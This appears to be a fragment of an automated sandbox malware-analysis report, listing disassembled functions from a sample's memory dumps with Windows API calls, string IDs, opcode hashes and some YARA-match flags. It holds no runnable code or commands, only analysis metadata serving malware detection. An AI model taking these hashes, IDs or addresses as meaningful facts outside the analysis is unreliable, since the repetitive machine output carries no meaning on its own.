                                                                                                                        • Instruction Fuzzy Hash: 205180729187009FC306DF38C955A1BFBEAEFD9784F04CB1DB88AA7251D730A8558B52
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00834B27
                                                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,?), ref: 00834B31
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1617791916-0
                                                                                                                        • Opcode ID: bf5f51028c1070f3f7077cc9ca13fafa2cda6b464b6fb32f15c4111e887a7053
                                                                                                                        • Instruction ID: b02f1fb1bab836b349b118e6ef760f53f82429d7cabec4a8c3549612bc533f1c
                                                                                                                        • Opcode Fuzzy Hash: bf5f51028c1070f3f7077cc9ca13fafa2cda6b464b6fb32f15c4111e887a7053
                                                                                                                        • Instruction Fuzzy Hash: E2C04C32555328B7CA103BA7EC0DBCA7F5CEB056A6F044051FA0997150CB6168009BE4
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: __floor_pentium4
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4168288129-0
                                                                                                                        • Opcode ID: 7d51092b3fb38a56b28d3b3cda4d76f23b0652e774e30859f083ffc3b692f30a
                                                                                                                        • Instruction ID: 944eceb4f856729eb1c8de27b23e42c8bead966e1111a9cc45cafa2a770c80a6
                                                                                                                        • Opcode Fuzzy Hash: 7d51092b3fb38a56b28d3b3cda4d76f23b0652e774e30859f083ffc3b692f30a
                                                                                                                        • Instruction Fuzzy Hash: 9F02B3715093599BC725EF25C891AAFB7E9FF99314F00091CF989D7241EB30AA05CBA3
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string:3157: assertion __first <= __last failed: string::erase(first, last) called with invalid range, xrefs: 00862E08
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string:3157: assertion __first <= __last failed: string::erase(first, last) called with invalid range
                                                                                                                        • API String ID: 667068680-1702088555
                                                                                                                        • Opcode ID: b53a1a89b837635f3bdcf8095281f9b5db4d91d0a16e142937631c85e0a1b705
                                                                                                                        • Instruction ID: 0bcf60d925f6d31fdc49d83df686d3a4bece7262c9ec48d68a9a42784c0698d7
                                                                                                                        • Opcode Fuzzy Hash: b53a1a89b837635f3bdcf8095281f9b5db4d91d0a16e142937631c85e0a1b705
                                                                                                                        • Instruction Fuzzy Hash: 0532D275E006199FCB14DFA8D885AADB7B6FF88310F150169F906EB391EB70AD01CB91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: __next_prime overflow
                                                                                                                        • API String ID: 0-822664188
                                                                                                                        • Opcode ID: 604f3fe8b80d2128a4f8f3b57e821136bbc6533d0121c1c9dddf65ddd75c5d97
                                                                                                                        • Instruction ID: b2b768336e11f4a60e06b2244d9073f752bd579c544ea8b667ec76a5179c8325
                                                                                                                        • Opcode Fuzzy Hash: 604f3fe8b80d2128a4f8f3b57e821136bbc6533d0121c1c9dddf65ddd75c5d97
                                                                                                                        • Instruction Fuzzy Hash: D712AE72B80125CBCB5CC928CCD956EB293FB94324B18C47ADC1EEB245DB34ED1D8665
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        • Opcode ID: 305e869ac04186f69d5be6eabac3b42e683359892f6d59ba473beeecc2e1308b
                                                                                                                        • Instruction ID: b6239024fa1e157e563bcf41d4f4fb3cade2f2a5c4b66128a7ff6af1348339ce
                                                                                                                        • Opcode Fuzzy Hash: 305e869ac04186f69d5be6eabac3b42e683359892f6d59ba473beeecc2e1308b
                                                                                                                        • Instruction Fuzzy Hash: CB429D31A04A56AFCB19CF69C480BA9FBF2FF48314F188169D499E7751D734A8A1CF80
                                                                                                                        Strings
                                                                                                                        • 0123456789abcdefABCDEFxX+-pPiInN, xrefs: 008826BB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0123456789abcdefABCDEFxX+-pPiInN
                                                                                                                        • API String ID: 0-2175827864
                                                                                                                        • Opcode ID: a6690ba84787d5acd5fd90e9a774747d9601a3afcf4e618265482a9cd8a69d5a
                                                                                                                        • Instruction ID: 0af0ebae4d17555807c509f9d8c02aefdc6ee3f74f457b4ca40e78214217a3a2
                                                                                                                        • Opcode Fuzzy Hash: a6690ba84787d5acd5fd90e9a774747d9601a3afcf4e618265482a9cd8a69d5a
                                                                                                                        • Instruction Fuzzy Hash: 5D226A71E002299BCF14EFA8C884AEDBBB1FF49324F194259E855BB381D774AD45CB90
                                                                                                                        Strings
                                                                                                                        • 0123456789abcdefABCDEFxX+-pPiInN, xrefs: 0087E973
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0123456789abcdefABCDEFxX+-pPiInN
                                                                                                                        • API String ID: 0-2175827864
                                                                                                                        • Opcode ID: 48ee3430fd1d65854926f4b981a8d8acf48390eb38f178f5e7e4eebfb5620cc7
                                                                                                                        • Instruction ID: 12cfd95df354f2af8004504ac982920b9fb4c03a4e31d9e7c09a0ffd3720d6c3
                                                                                                                        • Opcode Fuzzy Hash: 48ee3430fd1d65854926f4b981a8d8acf48390eb38f178f5e7e4eebfb5620cc7
                                                                                                                        • Instruction Fuzzy Hash: AC228F71E042298BCF15CFA8C8806EDBBB1FF49324F158699E859BB385D774AD05CB90
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0123456789abcdefABCDEFxX+-pPiInN
                                                                                                                        • API String ID: 0-2175827864
                                                                                                                        • Opcode ID: f4b8bdd8457bcfc4c45227cd8e011dcb7c307821fe9b7f9ba872adc4a704712f
                                                                                                                        • Instruction ID: 6c4d01d3e9fb4bfb16a7d25e448e9cb61202e7b6f936b5f8bacfe1470d1aea79
                                                                                                                        • Opcode Fuzzy Hash: f4b8bdd8457bcfc4c45227cd8e011dcb7c307821fe9b7f9ba872adc4a704712f
                                                                                                                        • Instruction Fuzzy Hash: 2422AE70A002598FCF14CF98C8906ADBBB2FF49314F28826DE859EB385D775AD45CB90
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0123456789abcdefABCDEFxX+-pPiInN
                                                                                                                        • API String ID: 0-2175827864
                                                                                                                        • Opcode ID: 2578e232ff7f59313892379f6f1eb9f706010ee5c1e5944bc3f6cd2116cd0f5e
                                                                                                                        • Instruction ID: d87428fff67468a1020d09ff90253fc7fcdb7310193bf52cdf629ead337d520b
                                                                                                                        • Opcode Fuzzy Hash: 2578e232ff7f59313892379f6f1eb9f706010ee5c1e5944bc3f6cd2116cd0f5e
                                                                                                                        • Instruction Fuzzy Hash: 41228D71A002598FCF15CF98C8906ADBBB2FF89314F28826DE859EB385D734AD45DB50
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0123456789abcdefABCDEFxX+-pPiInN
                                                                                                                        • API String ID: 0-2175827864
                                                                                                                        • Opcode ID: c1f97163e0947d2ec761e9db0faf58e5b41b6f8a578aef7a398aa841aa1016d8
                                                                                                                        • Instruction ID: f3d36a5d20e72c3a395edea7ff456c4f58bc55342cf7f7024ff42021cf0d7244
                                                                                                                        • Opcode Fuzzy Hash: c1f97163e0947d2ec761e9db0faf58e5b41b6f8a578aef7a398aa841aa1016d8
                                                                                                                        • Instruction Fuzzy Hash: DC228E71A003598FCF14CF98C890AADBBB2FF49314F288259E859EB385D775AD46CB50
                                                                                                                        APIs
                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00928DBD,?,?,00000008,?,?,0092C643,00000000), ref: 0092908F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3997070919-0
                                                                                                                        • Opcode ID: 0537da7340c3d81d78977cfec4d4ad69565b4b78e70c4ecea545dc52b3f48d42
                                                                                                                        • Instruction ID: 1fea9d6ec91f78e7a984d731c41c4b7da51593649852efea44223d2999e3c8b0
                                                                                                                        • Opcode Fuzzy Hash: 0537da7340c3d81d78977cfec4d4ad69565b4b78e70c4ecea545dc52b3f48d42
                                                                                                                        • Instruction Fuzzy Hash: FAB1AE31210619DFD714CF28D48ABA57BE1FF05324F298658E89ACF2E6C735E992CB40
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Y`l=
                                                                                                                        • API String ID: 0-1320565934
                                                                                                                        • Opcode ID: edf368804a618f218c17f208d3900245e3cb5d171d7fb9e5d82929b710462c2d
                                                                                                                        • Instruction ID: d957ccedd22c2e0bfa0f19c925bed4ccfe34f316631a6388b06b2f7e22f4debd
                                                                                                                        • Opcode Fuzzy Hash: edf368804a618f218c17f208d3900245e3cb5d171d7fb9e5d82929b710462c2d
                                                                                                                        • Instruction Fuzzy Hash: FDE134BBD553394BDB24CE79DC483AEA562B7C0304F869328D817EF248DB3549868BC1
                                                                                                                        APIs
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0090046C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2325560087-0
                                                                                                                        • Opcode ID: 5c9ab300f1d51a85aff2f73ac7b554a1c5f02f33fb0ebf885d0ae2eb1cb6ca82
                                                                                                                        • Instruction ID: d0c78ad7df2973e77c153748e99ba09a6044eb29329114e3cef2ae17c00338bd
                                                                                                                        • Opcode Fuzzy Hash: 5c9ab300f1d51a85aff2f73ac7b554a1c5f02f33fb0ebf885d0ae2eb1cb6ca82
                                                                                                                        • Instruction Fuzzy Hash: BD515CB1A146258FEB14CF65D8C57AABBF4FB88310F24842AD405EB290D3B59A54DF50
                                                                                                                        APIs
                                                                                                                        • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00916D63,?,-00000004), ref: 00916941
                                                                                                                          • Part of subcall function 0092450A: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0091DE8B,?,00000000,-00000008), ref: 0092456B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharInformationMultiTimeWideZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1123094072-0
                                                                                                                        • Opcode ID: b51f1c27afa7fcee5b7faac37931f766cb5744a05307a827378be68d7dee6b00
                                                                                                                        • Instruction ID: 751b69dea16cd913b711486a96e1fe5423cc1d0c9ae62955de0811bfc336f1de
                                                                                                                        • Opcode Fuzzy Hash: b51f1c27afa7fcee5b7faac37931f766cb5744a05307a827378be68d7dee6b00
                                                                                                                        • Instruction Fuzzy Hash: 6D41A4B1E04219BFCF10AFA5DC06B9E7BACEF45750F118065FA14A72A1E7709E90DB90
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 0-4108050209
                                                                                                                        • Opcode ID: 7111c669f6d44cbc8f8a6a43a232047415180a726c8752ab3431b2209ebd9888
                                                                                                                        • Instruction ID: 8d4e88d9bcf4962c0102fa59823bf64a77704c690d13eca1d1355fbe8f1d6e1f
                                                                                                                        • Opcode Fuzzy Hash: 7111c669f6d44cbc8f8a6a43a232047415180a726c8752ab3431b2209ebd9888
                                                                                                                        • Instruction Fuzzy Hash: 58C1EF346046468FCB38CFA8C588A7ABBBAFF45214F144A1AF4D797691D335AD0DCB60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0091DF1A: GetLastError.KERNEL32(00000000,?,0091AB09), ref: 0091DF1E
                                                                                                                          • Part of subcall function 0091DF1A: SetLastError.KERNEL32(00000000,?,?,00000028,00914B7E), ref: 0091DFC0
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00922D14
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3736152602-0
                                                                                                                        • Opcode ID: 3a8d58283f66fd507279f17d7ab09f427a69a93d01a07829cb3c37dc8092c7c6
                                                                                                                        • Instruction ID: dbe2f85cb62ecbf995fed30a6b1f640322cb4f6b9a17a6abd951f2625f8d595a
                                                                                                                        • Opcode Fuzzy Hash: 3a8d58283f66fd507279f17d7ab09f427a69a93d01a07829cb3c37dc8092c7c6
                                                                                                                        • Instruction Fuzzy Hash: 7421C57261521ABBDB289F24EC42BBA73ACEF44304F10007AFD02D6185EB78ED45CB50
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ,
                                                                                                                        • API String ID: 0-3772416878
                                                                                                                        • Opcode ID: 074f1b3635a8e9b5ace491adf911b0c15371299d348c69fb7a58ef832e6417d7
                                                                                                                        • Instruction ID: f83e7e9891d33ceebe1452b0ab7a81d6f9f94678ab0588ecd46c07546de3f95a
                                                                                                                        • Opcode Fuzzy Hash: 074f1b3635a8e9b5ace491adf911b0c15371299d348c69fb7a58ef832e6417d7
                                                                                                                        • Instruction Fuzzy Hash: D2D17271A0526A9FCB25CB68CC40BEDBB71BF56300F0442EAD459A7742D7709E94CFA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0091DF1A: GetLastError.KERNEL32(00000000,?,0091AB09), ref: 0091DF1E
                                                                                                                          • Part of subcall function 0091DF1A: SetLastError.KERNEL32(00000000,?,?,00000028,00914B7E), ref: 0091DFC0
                                                                                                                        • EnumSystemLocalesW.KERNEL32(00922A00,00000001,00000000,?,-00000050,?,009227E3,00000000,-00000002,00000000,?,00000055,?), ref: 009229CA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2417226690-0
                                                                                                                        • Opcode ID: 945b5e00c71dbd490dfc4123d57310c1bf856af3c8a8f32bd3b6b72d2f5994c6
                                                                                                                        • Instruction ID: 7fba44239203b538362c81516c989e4a573c521fc2eb29b89967d812fbd3a658
                                                                                                                        • Opcode Fuzzy Hash: 945b5e00c71dbd490dfc4123d57310c1bf856af3c8a8f32bd3b6b72d2f5994c6
                                                                                                                        • Instruction Fuzzy Hash: 3311C23B204705AFDB289F3998916BAB795FB84368B18442DE98787B44D371B982CB50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0091DF1A: GetLastError.KERNEL32(00000000,?,0091AB09), ref: 0091DF1E
                                                                                                                          • Part of subcall function 0091DF1A: SetLastError.KERNEL32(00000000,?,?,00000028,00914B7E), ref: 0091DFC0
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00922E34
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
